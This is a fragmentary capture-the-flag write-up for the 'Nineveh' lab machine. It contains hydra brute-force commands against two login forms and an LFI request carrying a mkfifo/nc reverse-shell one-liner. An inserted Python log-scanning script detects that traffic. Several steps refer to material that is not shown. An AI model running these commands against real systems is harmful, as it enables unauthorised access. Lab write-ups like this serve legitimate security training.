HTB Write-up Nineveh


80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time

Port 80 returned nothing, but after adding nineveh.htb to /etc/hosts, I got

Ran gobuster on the site.

Found a login page.

Possible usernames: admin, amrois

MySQL is installed?

Tried different sqlmap options but had no luck.

Trying to crack it with hydra:

hydra -l admin -P ~/rockyou.txt nineveh.htb http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 54

password = 1q2w3e4r5t

HTTP admin page:

The notes page has an LFI vuln?

include() is executing the PHP code.

This cool trick below encodes the PHP source code so we can read it:


In this case it doesn't work.

HTTPS enum


After running gobuster, I found a phpLiteAdmin v1.9 login form.

An interesting warning:

Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114


hydra -l admin -P ~/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:F=Incorrect"


Code execution on the site

Used this exploit:

Now we can execute commands.

Sent it to Burp and modified the request to:

GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+>/tmp/f
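The LFI in the notes page and the cmd parameter used above both leave a clear trace in the web server's access log. As an added example (not from the original write-up), this Python script scans constructed Apache access-log lines and flags a notes= value that is not a relative path under an assumed files/ directory, or any request carrying a cmd= parameter; the log lines, IP address and the files/ prefix are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not taken from the original write-up).
# The last two mimic the absolute-path include and the cmd= parameter seen above.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jul/2017:15:10:01 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 512
10.10.14.5 - - [01/Jul/2017:15:10:09 +0000] "GET /department/login.php HTTP/1.1" 200 1024
10.10.14.5 - - [01/Jul/2017:15:11:42 +0000] "GET /department/manage.php?notes=/etc/passwd HTTP/1.1" 200 2048
10.10.14.5 - - [01/Jul/2017:15:12:03 +0000] "GET /department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=id HTTP/1.1" 200 77
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumed: legitimate notes values are relative paths under files/.
ALLOWED_NOTES_PREFIX = "files/"


def classify_request(target: str) -> List[str]:
    """Return findings for one request target (path plus query string)."""
    findings: List[str] = []
    parts = urlsplit(target)
    if parts.path != "/department/manage.php":
        return findings
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("notes", []):
        value = unquote(raw)  # parse_qs decodes once; this catches double-encoding
        if value.startswith("/") or ".." in value or "://" in value \
                or not value.startswith(ALLOWED_NOTES_PREFIX):
            findings.append(f"LFI: notes={value}")
    if "cmd" in params:  # manage.php takes no cmd parameter; its presence is a red flag
        findings.append(f"RCE: cmd={params['cmd'][0]}")
    return findings


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse each log line and collect alerts for requests with findings."""
    alerts: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        findings = classify_request(m["target"])
        if findings:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], "; ".join(alert["findings"]))
```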

Got the reverse shell, but not a TTY.

Cannot complete due to the slowness of the machine!
